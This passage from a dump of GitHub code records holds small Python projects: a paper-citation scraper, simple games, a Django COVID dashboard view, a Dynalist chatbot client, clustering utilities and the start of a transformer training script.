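    return counter.cnt

print(counter(), counter(), counter())  # 1 2 3
```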
organic results\n for result in organic_results:\n # Calculate the similarity between the result title and the paper title\n similarity = calc_similarity(result[\"title\"], paper_title)\n\n # Check if the similarity is above a threshold (e.g., 0.8)\n if similarity > 0.8:\n # Return the matching result\n return result\n\n # If no match is found, return None\n return None\n\n\ndef write_paper_info_to_file(filename, name, papers, api_key):\n \"\"\"\n Writes paper information to a file in CSV format.\n\n Parameters:\n filename (str): The directory path where the file will be created.\n name (str): The name of the file (without extension).\n papers (list): A list of dictionaries containing paper information.\n api_key (str): The API key for accessing the Google Scholar API.\n\n Returns:\n None\n\n \"\"\"\n # Construct the file path\n path_file = filename + \"/\" + name + \".csv\"\n\n # Open the file in write mode\n with open(path_file, mode='w', newline='', encoding='utf-8') as file:\n # Create a CSV writer object\n writer = csv.writer(file)\n\n # Write the header row\n writer.writerow(['title', 'title_google', 'author',\n 'author_google', 'cited_by', 'observation'])\n\n # Iterate over the papers\n for dictionary in papers:\n title = dictionary.get('title')\n title_google = dictionary.get('title_google')\n author = dictionary.get('author')\n author_google = dictionary.get('author_google')\n cited_by = dictionary.get('cited_by')\n observation = '-'\n\n # Search for additional paper information using the Google Scholar API\n paper_info = search_paper_info(title, api_key)\n\n if paper_info:\n # Update the title and author information from the API response\n author_google = paper_info[\"publication_info\"][\"summary\"]\n title_google = paper_info[\"title\"]\n\n try:\n cited_by = paper_info[\"inline_links\"][\"cited_by\"][\"total\"]\n except KeyError:\n cited_by = 0\n else:\n observation = 'not found'\n\n # Write a row of data to the CSV file\n writer.writerow([title, title_google, author,\n author_google, cited_by, observation])\n\n\ndef create_directory(file_name=\"csv\"):\n \"\"\"\n Creates a directory with the specified name if it doesn't exist.\n\n Parameters:\n file_name (str): The name of the directory to be created (default is 'csv').\n\n Returns:\n None\n\n \"\"\"\n # Set the folder name\n folder_name = file_name\n\n # Construct the folder path using the current working directory and the folder name\n folder_path = os.path.join(os.getcwd(), folder_name)\n\n # Check if the folder already exists\n if os.path.exists(folder_path):\n print(\"The folder already exists\")\n else:\n # Create the folder if it doesn't exist\n os.mkdir(folder_path)\n\nconferences_years = ['WER00']\n\n# Constantes\nCONFERENCE_URL = 'http://wer.inf.puc-rio.br/WERpapers/papers_by_conference.lp?conference='\nAPI_KEY = ''\nFILE_NAME = 'csv'\n\nfor name in conferences_years:\n conference_url = CONFERENCE_URL + name\n papers = get_paper_titles(conference_url)\n create_directory(FILE_NAME)\n write_paper_info_to_file(FILE_NAME, name, papers, API_KEY)\n","repo_name":"daniel2019-max/PaperScraper","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343412433","text":"from threading import Thread\r\nimport random\r\n\r\nrandom_number = []\r\n\r\n# generating random number\r\nfor _ in range(15):\r\n random_number.append(random.randrange(50))\r\nprint(f\"random_numbers = 
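`calc_similarity` in the `scrapping.py` entry above wraps `difflib.SequenceMatcher`; the 0.8 threshold used when matching Google Scholar titles behaves like this in isolation:

```python
from difflib import SequenceMatcher

def calc_similarity(str1: str, str2: str) -> float:
    # Case- and surrounding-whitespace-insensitive similarity in [0, 1].
    return SequenceMatcher(None, str1.strip().lower(), str2.strip().lower()).ratio()

print(calc_similarity("Requirements Engineering", " requirements engineering"))   # 1.0
print(calc_similarity("Requirements Engineering", "Software Architecture") > 0.8) # False
```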
{random_number}\")\r\n\r\n\r\ndef print_odd():\r\n odd_numbers = []\r\n # separating odd numbers\r\n for item in random_number:\r\n if item % 2 == 1:\r\n odd_numbers.append(item)\r\n\r\n # printing odd numbers\r\n print(f\"odd_numbers = {odd_numbers}\")\r\n\r\n\r\ndef print_even():\r\n even_numbers = []\r\n # separating even numbers\r\n for item in random_number:\r\n if item % 2 == 0:\r\n even_numbers.append(item)\r\n\r\n # printing odd numbers\r\n print(f\"even_numbers = {even_numbers}\")\r\n\r\n\r\n# creating thread objects\r\nodd_thread = Thread(target=print_odd, name=\"odd\")\r\neven_thread = Thread(target=print_even, name=\"even\")\r\n\r\nodd_thread.start()\r\neven_thread.start()\r\n","repo_name":"Harshil2312/Pythonpracticales","sub_path":"odd_even.py","file_name":"odd_even.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36054561667","text":"from sqlalchemy import create_engine, engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, Session\nimport os\nimport dotenv\n\n\ndotenv.load_dotenv(\".env\")\n\n\ndb_to_connect_to = \"test_db\"\n\nif os.environ['ENV'] == \"prod\":\n db_to_connect_to = \"postgres\"\n\ntry:\n\n SOLDEV_DB = engine.URL.create(\n \"postgresql\",\n username = os.environ['POSTGRE_USER'],\n password = os.environ['POSTGRE_PASS'],\n host = os.environ['POSTGRE_HOST'],\n database = db_to_connect_to\n \n )\n\n\n soldev_engine = create_engine(\n SOLDEV_DB,\n pool_size=40, max_overflow=8, echo=False\n )\n\n Session_ = sessionmaker(autocommit=False, autoflush=False, bind=soldev_engine)\n \n print(\"Connected to\", os.environ['ENV'])\n\nexcept Exception as e:\n print(\"Error making connection: \", e)\n print(\"\\n\")\n\nBase = declarative_base()\n\n\ndef get_db():\n db = Session_()\n \n try:\n yield db\n finally:\n db.close()\n \n\n\n\n","repo_name":"purgatoryforcookies/Helsinki-City-Bike","sub_path":"back/src/internal/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20877180857","text":"import random\r\n\r\nprint(\"Welcome to Rock-Paper-Scissors game!\")\r\n\r\n# list of possible choices\r\nchoices = [\"rock\", \"paper\", \"scissors\"]\r\n\r\nwhile True:\r\n # computer randomly selects a choice\r\n computer_choice = random.choice(choices)\r\n\r\n # ask user to make a choice\r\n user_choice = input(\"Enter your choice (rock/paper/scissors): \")\r\n\r\n # validate user input\r\n if user_choice not in choices:\r\n print(\"Invalid choice, please try again\")\r\n continue\r\n\r\n print(\"You chose:\", user_choice)\r\n print(\"Computer chose:\", computer_choice)\r\n\r\n # check for a tie\r\n if user_choice == computer_choice:\r\n print(\"It's a tie!\")\r\n # check for a win\r\n elif (user_choice == \"rock\" and computer_choice == \"scissors\") or \\\r\n (user_choice == \"paper\" and computer_choice == \"rock\") or \\\r\n (user_choice == \"scissors\" and computer_choice == \"paper\"):\r\n print(\"You win!\")\r\n # otherwise, user loses\r\n else:\r\n print(\"You lose!\")\r\n\r\n # ask user if they want to play again\r\n play_again = input(\"Do you want to play again? 
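The `odd_even.py` entry above starts its two threads but never joins them (the non-daemon threads still finish before interpreter shutdown); a variant that waits explicitly, so any code after the loop runs only once both lists have been printed:

```python
from threading import Thread
import random

numbers = [random.randrange(50) for _ in range(15)]

def print_parity(parity: str) -> None:
    remainder = 1 if parity == "odd" else 0
    print(f"{parity}_numbers = {[n for n in numbers if n % 2 == remainder]}")

threads = [Thread(target=print_parity, name=p, args=(p,)) for p in ("odd", "even")]
for t in threads:
    t.start()
for t in threads:
    t.join()  # block until both workers have printed their lists
print("done")
```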
(y/n): \")\r\n if play_again.lower() != \"y\":\r\n break\r\n\r\nprint(\"Thanks for playing!\")\r\n\r\n","repo_name":"sohil-khann/projects","sub_path":"rock-paper-scissor-game.py","file_name":"rock-paper-scissor-game.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22816791906","text":"\n\n#Juggling Dog\nimport random\nimport pygame\n\n#initialize pygame\npygame.init()\n\n#GAME CONSTANTS\nGAME_FOLDER = 'D:/python project/game dev/art_of_game_development/game_4/'\nWINDOW_WIDTH = 1300\nWINDOW_HEIGHT = 700\nFPS = 60\nDOG_VELOCITY = 10\nBALL_VELOCITY = 5\nBUFFER_DISTANCE = -200\n\nGOLDEN = pygame.Color(255,201,14)\nRED = pygame.Color(255,0,0)\nBLUE = pygame.Color(0,0,255)\n\nMAX_LIVES = 5\n\n#create a window\ndisplay_surface = pygame.display.set_mode((WINDOW_WIDTH,WINDOW_HEIGHT))\npygame.display.set_caption('Juggling Dog')\n\n#background\nbackground_image = pygame.transform.scale( pygame.image.load(GAME_FOLDER + 'background.png'), (WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.mixer.music.load(GAME_FOLDER + 'background_music.mp3')\npygame.mixer.music.set_volume(0.5)\npygame.mixer.music.play(-1)\n\n#game assets\ndog_left = pygame.image.load(GAME_FOLDER+ 'dog_left.png')\ndog_right = pygame.image.load(GAME_FOLDER+ 'dog_right.png')\ndog = dog_right\ndog_rect = dog.get_rect()\ndog_rect.bottom = WINDOW_HEIGHT\ndog_rect.centerx = WINDOW_WIDTH//2\n\nball = pygame.image.load(GAME_FOLDER + 'ball.png')\nball_rect = ball.get_rect()\nball_rect.top = BUFFER_DISTANCE\nball_rect.left = random.randint(0, WINDOW_WIDTH- ball_rect.width)\n\n#sounds\nloss = pygame.mixer.Sound(GAME_FOLDER + 'loss.wav')\nloss.set_volume(0.5)\nbounce = pygame.mixer.Sound(GAME_FOLDER + 'bounce.mp3')\n\n#game values\nchange_x = 0\nchange_y = BALL_VELOCITY\ncnt =0\ny_multiples = [-1,-1/2,-1/4, 1/4,1/2, 1]\ny_interval = FPS//6\nmultiple_index = 0\nscore = 0\nlives = MAX_LIVES\ngame_status = 1\n\nbounce_ball = False\nrunning = True\nclock = pygame.time.Clock()\n\n#game_texts\ngame_font_big = pygame.font.Font(GAME_FOLDER +'SunnyspellsRegular.otf',60)\ngame_font = pygame.font.Font(GAME_FOLDER +'SunnyspellsRegular.otf', 40)\n\ngame_title = game_font_big.render('Juggling Dog', True, GOLDEN)\ngame_title_rect = game_title.get_rect()\ngame_title_rect.centerx = WINDOW_WIDTH//2\ngame_title_rect.top = 10\n\nplayer_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\nplayer_lives_rect = player_lives.get_rect()\nplayer_lives_rect.left = 10\nplayer_lives_rect.top = 10\n\nplayer_score = game_font.render('Score: ' + str(score), True, GOLDEN)\nplayer_score_rect = player_score.get_rect()\nplayer_score_rect.right = WINDOW_WIDTH -10\nplayer_score_rect.top = 10\n\ngame_ends = game_font_big.render('GAME ENDS!!!', True, RED)\ngame_ends_rect = game_ends.get_rect()\ngame_ends_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT//2)\n\ngame_restart = game_font.render('Press r to Restart, q to Quit', True, BLUE)\ngame_restart_rect = game_restart.get_rect()\ngame_restart_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT//2 +60)\n\nmade_by = game_font.render('#NITINYADAVAHIR',True,RED)\nmade_by_react = made_by.get_rect()\nmade_by_react.left = 1050\nmade_by_react.top =657\n\n#main game loop (defines the life of the game)\nwhile running:\n #blit the background\n display_surface.blit(background_image, (0,0))\n display_surface.blit(made_by,made_by_react)\n\n events = pygame.event.get()\n for ev in events:\n if ev.type == pygame.QUIT:\n running = False\n\n if game_status == 
1:\n if bounce_ball:\n if cnt < FPS:\n ball_rect.left += change_x #x_path\n ball_rect.top += change_y * y_multiples[multiple_index] #y_path\n cnt+=1\n if cnt % y_interval == 0:\n multiple_index+=1\n else:\n bounce_ball = False\n else:\n ball_rect.top+= change_y\n ball_rect.left += change_x\n\n #continuous key movement\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_LEFT]:\n dog = dog_left\n if dog_rect.left >=0:\n dog_rect.left-= DOG_VELOCITY\n if keys[pygame.K_RIGHT]:\n dog = dog_right\n\n if dog_rect.right <= WINDOW_WIDTH:\n dog_rect.left += DOG_VELOCITY\n\n if dog_rect.colliderect(ball_rect):\n change_x = random.randint(3,6)\n change_y = change_x * 3\n cnt = 0\n multiple_index = 0\n bounce_ball = True\n bounce.play()\n score+=1\n player_score = game_font.render('Score: ' + str(score), True, GOLDEN)\n\n if dog == dog_left:\n change_x = -change_x\n else:\n change_x = +change_x\n\n\n if ball_rect.bottom > WINDOW_HEIGHT:\n loss.play()\n #a new ball should be presented\n ball_rect.top = BUFFER_DISTANCE\n ball_rect.left = random.randint(0, WINDOW_WIDTH- ball_rect.width)\n change_x = 0\n change_y = BALL_VELOCITY\n multiple_index = 0\n lives-=1\n player_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\n\n if lives == 0:\n #game ends\n game_status = 2\n pygame.mixer.music.stop()\n\n\n # blit the assets\n display_surface.blit(dog, dog_rect)\n display_surface.blit(ball, ball_rect)\n\n elif game_status == 2:\n display_surface.blit(game_ends, game_ends_rect)\n display_surface.blit(game_restart, game_restart_rect)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_r]:\n change_x = 0\n change_y = BALL_VELOCITY\n cnt = 0\n multiple_index = 0\n score = 0\n player_score = game_font.render('Score: ' + str(score), True, GOLDEN)\n lives = MAX_LIVES\n player_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\n game_status = 1\n bounce_ball = False\n pygame.mixer.music.play(-1)\n elif keys[pygame.K_q]:\n running = False\n\n #blit the hud\n display_surface.blit(game_title, game_title_rect)\n display_surface.blit(player_lives, player_lives_rect)\n display_surface.blit(player_score, player_score_rect)\n\n\n #update the display\n pygame.display.update()\n\n #Moderate the loop's iteration rate (cooperative multitasking)\n #Game runs at the same speed over different CPU's\n clock.tick(FPS)\n\n#quit pygame\npygame.quit()","repo_name":"NITINYADAVAHIR/jungllingdog","sub_path":"juggling_dog.py","file_name":"juggling_dog.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19658554369","text":"#!/usr/bin/env python3\n\nfrom math import pi\n\n# calculate\n\nresult = 5 * 5 * pi\n\nresult2 = 5**2 * pi\nr = 5\nr **= 2\nresult3 = pi * r\nprint(result)\n\nprint(result2)\n\nprint(result3)\n","repo_name":"MingGeng/shiyanlou_python_louPlus","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16017886795","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import CasosPorProvincia,DatosCOVID\ndef index(request):\n\n por_provincia = CasosPorProvincia.objects.filter().order_by('-Casos_positivos')\n datos_covid = DatosCOVID.objects.latest('id')\n labe=[]\n color_borde=[]\n color=[]\n cont=255\n cont2=0\n total_positivos =0\n for i in por_provincia:\n labe.append([i.Provincia])\n total_positivos=total_positivos + 
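The bounce in `juggling_dog.py` above runs for `FPS` frames, stepping through `y_multiples` every `FPS // 6` frames; because the multiples are symmetric around zero, the arc's net vertical displacement is exactly zero:

```python
FPS = 60
change_y = 15  # example vertical speed after a hit
y_multiples = [-1, -1/2, -1/4, 1/4, 1/2, 1]
y_interval = FPS // 6

# Sum the per-frame vertical movement over one full bounce.
total = sum(change_y * y_multiples[frame // y_interval] for frame in range(FPS))
print(total)  # 0.0 -- the ball ends the arc at the height it started
```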
i.Casos_positivos\n color_borde.append('rgba(' + str(cont) + ', 30,' + str(cont2) + ', 1)')\n color.append('rgba(' + str(cont) + ', 30, ' + str(cont2) + ', 0.3)')\n cont = cont - 10.5\n cont2 = cont2 + 10.5\n\n dict={\n 'positivostotal':total_positivos,\n 'datosprovincia':por_provincia,\n 'datoscovid': datos_covid,\n 'color1': color_borde,\n 'color2': color\n }\n return render(request, 'index.html',dict)","repo_name":"Nemo1710/basedeproyecto2020","sub_path":"covid19/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33080142536","text":"import requests\nimport typing\nfrom bot import Entity\nfrom bot import CAIConversation\nimport phonenumbers\nimport phonenumbers.geocoder\nfrom emojiflags.lookup import lookup\nfrom phonenumbers.phonenumberutil import region_code_for_number\nimport nltk\n\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\n\nclass DynalistClient:\n \"\"\"This client handles the calls to the dynalist API enpoints\"\"\"\n\n def _call_api(self, cai_conversation, api):\n payload = api.build_api_request(self, conversation=cai_conversation)\n print(payload)\n return requests.post(api.address, json=payload)\n\n def call_check_token_api(self, cai_conversation):\n return self._call_api(cai_conversation=cai_conversation, api=CheckTokenAPI)\n\n def call_inbox_add_api(self, cai_conversation):\n return self._call_api(cai_conversation=cai_conversation, api=InboxAddAPI)\n\n\nclass DynalistApiType:\n address = None\n\n def build_api_request (self, conversation: CAIConversation):\n pass\n\n\nclass CheckTokenAPI(DynalistApiType):\n address = 'https://dynalist.io/api/v1/file/list'\n\n def build_api_request(self, conversation: CAIConversation):\n return {\"token\": conversation.token}\n\n\nclass InboxAddAPI(DynalistApiType):\n address = 'https://dynalist.io/api/v1/inbox/add'\n\n def build_api_request(self, conversation: CAIConversation):\n item = DynalistItem.from_cai_conversation(conversation)\n\n map_entities = {\n 'person': item.format_person,\n 'datetime': item.format_datetime,\n 'location': item.format_location,\n 'email': item.format_email,\n 'phone': item.format_phone,\n 'url': item.format_url\n }\n\n for entity in conversation.entities:\n processing_method = map_entities.get(entity.name)\n if processing_method:\n processing_method(entity)\n\n return {\n \"token\": item.get_token(),\n \"content\": item.get_content(),\n \"note\": item.get_note()\n }\n\n\nclass DynalistItem:\n \"\"\"Building together a note to write down metadata about the message\"\"\"\n\n @classmethod\n def from_cai_conversation(cls, response):\n return DynalistItem(response.channel, response.timestamp, response.contact, response.token, response.message)\n\n def __init__(self, channel: str, timestamp: str, contact: str, token: str, content: str):\n self.channel = channel\n self.timestamp = timestamp\n self.contact = contact\n self.token = token\n self.content = content\n self.note = \"\"\n\n def get_note(self):\n self.build_note()\n return self.note\n\n def build_note(self):\n if self.channel:\n channel_str = self.to_add_tag(self.channel)\n else:\n channel_str = '@' + 'channel'\n time_str = '!(' + self.timestamp + ')'\n if not self.contact:\n contact_str = '@' + 'AContact'\n else:\n contact_str = self.contact\n\n self.note = '#message on {0} from {1} {2}'.format(channel_str, contact_str, time_str)\n\n def get_content(self):\n return self.content\n\n def 
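The covid19 `index` view above derives one rgba colour per province by sliding the red channel down and the blue channel up in 10.5-unit steps; the colour loop in isolation:

```python
def province_colors(n: int, step: float = 10.5) -> list:
    red, blue = 255, 0
    colors = []
    for _ in range(n):
        colors.append(f'rgba({red}, 30, {blue}, 0.3)')
        red -= step
        blue += step
    return colors

print(province_colors(3))
# ['rgba(255, 30, 0, 0.3)', 'rgba(244.5, 30, 10.5, 0.3)', 'rgba(234.0, 30, 21.0, 0.3)']
```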
get_token(self):\n return self.token\n\n def format_person(self, entity: Entity):\n if entity.name == 'person':\n formatted_name = self.to_add_tag(entity.fullname)\n pattern_whatsapp= '[{0}] '\n pattern_custom = ' @ {0}'\n if not self.replace_contact(entity.raw, pattern_whatsapp, formatted_name):\n if not self.replace_contact(entity.raw, pattern_custom, formatted_name):\n self.content = self.content.replace(entity.raw, formatted_name)\n\n def format_datetime(self, entity: Entity):\n if entity.name == 'datetime':\n # return cuttoff index from iso\n accuracy_dict = {\n 'year': 4,\n 'month': 7,\n 'week': 7,\n 'day': 10,\n 'halfday': 10,\n 'hour': 13,\n 'min': 16,\n 'sec': 19,\n 'now': 19\n }\n closest_accuracy = entity.accuracy.rpartition(',')[2]\n formatted_date = entity.iso[:accuracy_dict[closest_accuracy]]\n dynalist_formatted_date = ' (!({0}))'.format(formatted_date)\n self.content = (entity.raw + dynalist_formatted_date).join(self.content.split(entity.raw))\n\n def format_location(self, entity: Entity):\n if entity.name == 'location':\n google_url = 'https://www.google.com/maps/place/?q=place_id:' + entity.place\n self.insert_link_in_content(google_url, entity.raw)\n\n def format_email(self, entity: Entity):\n mail_url = 'mailto:' + entity.raw\n self.insert_link_in_content(mail_url, entity.raw)\n\n def format_phone(self, entity: Entity):\n formatted_number = phonenumbers.parse(entity.number, None, _check_region=False)\n\n if formatted_number.country_code: #international Number provided\n region_code = region_code_for_number(formatted_number)\n flag_emoji = lookup(region_code)\n formatted_number_str = flag_emoji + ' ' + phonenumbers.format_number(formatted_number,\n phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n else:\n formatted_number = phonenumbers.parse(entity.number, 'US')\n formatted_number_str = phonenumbers.format_number(formatted_number, phonenumbers.PhoneNumberFormat.NATIONAL)\n phone_url = 'tel:' + entity.number\n self.insert_link_in_content(phone_url,entity.raw, formatted_number_str)\n\n def format_url(self, entity: Entity):\n tokens = nltk.word_tokenize(self.content)\n tagged_tokens = nltk.pos_tag(tokens)\n determiner = [token for token in tagged_tokens if token[1] == 'DT']\n if determiner:\n determiner_word = determiner[-1][0] #we take the last one as we hope that the last determiner refers to the URL\n #optional find the determiner nearest to the url\n self.content = self.content.replace(\" \" + entity.raw, '')\n self.insert_link_in_content(entity.raw, determiner_word)\n\n else:\n self.insert_link_in_content(entity.raw, entity.raw, entity.host)\n\n def format_distance(self, entity: Entity):\n pass\n\n if entity.unit not in ('km', 'm', 'cm', 'mm'): #metrical units\n format = '{0} {1}/`{2} {3}`'\n metrical_scalar =0\n metrical_unit =0\n self.insert_format_in_content(entity.raw,\n format,\n entity.scalar,\n entity.unit,\n metrical_scalar,\n metrical_unit)\n\n\n\n def insert_link_in_content(self, url: str, raw: str, link_title=None):\n if not link_title:\n link_title = raw\n\n link_format = '[{0}]({1})'\n self.insert_format_in_content(raw, link_format, link_title, url)\n\n def insert_format_in_content(self, raw: str, string_format: str, *parameters):\n left_whitespace_format = ' {0}'\n right_whitespace_format = '{0} '\n left_right_whitespace_format = ' {0} '\n\n if left_right_whitespace_format.format(raw) in self.content:\n string_format = left_right_whitespace_format.format(string_format)\n raw = left_right_whitespace_format.format(raw)\n elif 
right_whitespace_format.format(raw) in self.content:\n string_format = right_whitespace_format.format(string_format)\n raw = right_whitespace_format.format(raw)\n elif left_whitespace_format.format(raw) in self.content:\n string_format = left_whitespace_format.format(string_format)\n raw = left_whitespace_format.format(raw)\n self.content = (string_format.format(*parameters)).join(self.content.split(raw))\n\n # TODO move to utils\n def to_add_tag(self, tag: str):\n capitalized_words = [x.capitalize() for x in tag.split()]\n capitalized_word = ''.join(capitalized_words)\n channel_str = '@' + capitalized_word\n return channel_str\n\n def replace_contact (self, raw_name: str, pattern: str, name: str):\n if pattern.format(raw_name) in self.content:\n self.content = self.content.replace(pattern.format(raw_name), '')\n self.contact = name\n return True\n return False\n\n\n\n\n\n\n","repo_name":"PoJo93/dynalist-chatbot","sub_path":"bot/dynalist.py","file_name":"dynalist.py","file_ext":"py","file_size_in_byte":8714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"39116548204","text":"from typing import List, Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom tslearn.clustering import TimeSeriesKMeans, KernelKMeans\nfrom tslearn.preprocessing import TimeSeriesResampler\nfrom tslearn.utils import to_time_series_dataset\n\nplt.style.use('seaborn')\n\n\ndef get_train_data(data: pd.DataFrame) -> np.ndarray:\n sessions = data.groupby(\"session_id\")[\"norm_price\"].mean()\n\n X = []\n for index, count in zip(sessions.index, sessions):\n month = data[data.session_id == index].date.unique()[0].month\n X.append([count, month])\n\n return np.array(X)\n\n\ndef plot_clusters(data: np.ndarray, labels: np.ndarray):\n fig, ax = plt.subplots()\n\n colors = list(\"bgrcmykw\")\n\n for i, x in enumerate(data):\n ax.scatter(x[0], x[1], c=colors[labels[i]])\n\n plt.title(\"Кластеризация месячных сессий\")\n plt.xlabel(\"Средняя цена за сессию\")\n plt.ylabel(\"Месяц\")\n\n plt.show()\n\n\ndef get_time_series(data: pd.DataFrame, feature: str) -> List[List[Union[int, float]]]:\n return [value.tolist() for id_, value in data.groupby(\"session_id\")[feature]]\n\n\ndef plot_ts_clusters(cluster_centers: np.ndarray, data: np.ndarray,\n labels: np.ndarray, n_clusters: int, title: str = None):\n plt.figure(figsize=(20, 20))\n plt.suptitle(title)\n\n for yi in range(n_clusters):\n plt.subplot((n_clusters + 1) // 2, 2, 1 + yi)\n\n for xx in data[labels == yi]:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n\n plt.plot(cluster_centers[yi].ravel(), \"r-\")\n plt.setp(plt.gca().xaxis.get_majorticklabels(),\n 'rotation', 0)\n plt.title(\"Cluster %d\" % (yi + 1))\n\n plt.show()\n\n\ndef prepare_data(data: pd.DataFrame, feature: str) -> np.ndarray:\n time_series = get_time_series(data, feature)\n train = to_time_series_dataset(time_series)\n train = TimeSeriesResampler(sz=train.shape[1]).fit_transform(train)\n train = np.nan_to_num(train)\n\n return train\n\n\ndef use_ts_kmeans(data: np.ndarray, n_clusters: int, metric: str, seed: int):\n model = TimeSeriesKMeans(n_clusters=n_clusters, metric=metric, random_state=seed)\n y_pred = model.fit_predict(data)\n\n plot_ts_clusters(model.cluster_centers_, data, y_pred, n_clusters)\n\n\ndef use_general_kmeans(data: pd.DataFrame, n_clusters: int):\n X = get_train_data(data)\n kmeans = KMeans(n_clusters=n_clusters).fit(X)\n plot_clusters(X, kmeans.labels_)\n\n\ndef 
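`to_add_tag` in the `dynalist.py` entry above turns a free-form name into a CamelCase Dynalist `@tag`; standalone:

```python
def to_add_tag(tag: str) -> str:
    # capitalize() uppercases the first letter and lowercases the rest.
    return "@" + "".join(word.capitalize() for word in tag.split())

print(to_add_tag("john smith"))    # @JohnSmith
print(to_add_tag("WhatsApp web"))  # @WhatsappWeb
```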
use_kernel_kmeans(data: np.ndarray, n_clusters: int, seed: int):\n gak_km = KernelKMeans(n_clusters=n_clusters,\n kernel=\"cosine\",\n random_state=seed)\n y_pred = gak_km.fit_predict(data)\n\n plt.figure(figsize=(20, 20))\n\n for yi in range(n_clusters):\n plt.subplot((n_clusters + 1) // 2, 2, 1 + yi)\n for xx in data[y_pred == yi]:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n plt.title(\"Cluster %d\" % (yi + 1))\n\n plt.tight_layout()\n plt.show()\n","repo_name":"nkarasovd/HSE_Production_Stories","sub_path":"Task_2/clustering_utils.py","file_name":"clustering_utils.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71917498490","text":"import ipdb\nimport sys\nsys.path.append('/home2/sisodiya.bhoomendra/github/contrastive_learning/src')\nfrom model.model import Transformer_Model\nfrom model.dataset import JudgementDataset\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom torcheval.metrics import BinaryF1Score,BinaryPrecision,BinaryRecall\n\n\nimport torch\nimport yaml\nimport wandb\n\n\ndef pad_batch(x):\n # x is a list of datapoints that we get from JudgementDataset\n # Size of the list is equal to batch size\n # We will just take the judgements which ha\n # Pad both documents to a fixed length\n padd = torch.zeros((1,768))\n labels = []\n d1 = []\n d2 = []\n masks = []\n limit = 80\n for v in x:\n x1,x2,l = v # X1 (C,768) X2 (M,768) should become (80,768)\n padd_mask = torch.zeros(162,dtype=torch.bool).to(x1.device)\n nums_padd_1 = limit - x1.shape[0]\n nums_padd_2 = limit - x2.shape[0]\n out1 = torch.cat((x1,padd.repeat((nums_padd_1,1)).to(x1.device)), dim=0)\n out2 = torch.cat((x2,padd.repeat((nums_padd_2,1)).to(x2.device)),dim=0)\n padd_mask[nums_padd_1:limit] = 1\n padd_mask[limit+1+nums_padd_2:] = 1\n masks.append(padd_mask)\n d1.append(out1)\n d2.append(out2)\n labels.append(l)\n x1 = torch.stack(d1)\n x2 = torch.stack(d2)\n labels = torch.stack(labels)\n masks = torch.stack(masks)\n return x1,x2,labels,masks\n\n\ndef train(config):\n # Which model\n # Model config\n # Training parameters \n # Learning rate , loss , learning rate scheduler , optimizer , batch size , number of epochs\n # Early stopping and checkpointing\n # Logging\n # Define collate function in the dataloader\n device = 'cuda'\n wblog = wandb.init(project=\"Precedencer Classification Trasfomer\",config=config)\n train_dataset = JudgementDataset(config=config['dataset'],which='train')\n valid_dataset = JudgementDataset(config=config['dataset'],which='valid')\n # test_dataset = JudgementDataset(config=config['dataset'],which='test')\n # ipdb.set_trace()\n print(f\"Train size: {len(train_dataset)} , Valid size: {len(valid_dataset)} \")#, Test size: {len(test_dataset)}\")\n \n\n train_dataloader = DataLoader(dataset=train_dataset,batch_size=config['model']['batch_size'],shuffle=True,collate_fn=pad_batch)\n # test_dataloader = DataLoader(dataset=test_dataset,batch_size=config['model']['batch_size'],collate_fn=pad_batch)\n valid_dataloader = DataLoader(dataset=valid_dataset,batch_size=config['model']['batch_size'],collate_fn=pad_batch)\n\n model = Transformer_Model(config=config['model']).to(device)\n\n loss = torch.nn.CrossEntropyLoss()\n optim = torch.optim.AdamW(params=model.parameters(),lr=config['train']['lr'])\n metric = BinaryF1Score()\n precision = BinaryPrecision()\n recall = BinaryRecall()\n scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer=optim,T_0=100) 
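\n # Note: scheduler.step() is later called with an absolute batch index\n # (epoch*len(train_dataloader)+batch), so T_0=100 here is measured in those\n # step units; the PyTorch docs' idiom is step(epoch + batch/len(loader)).\n 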
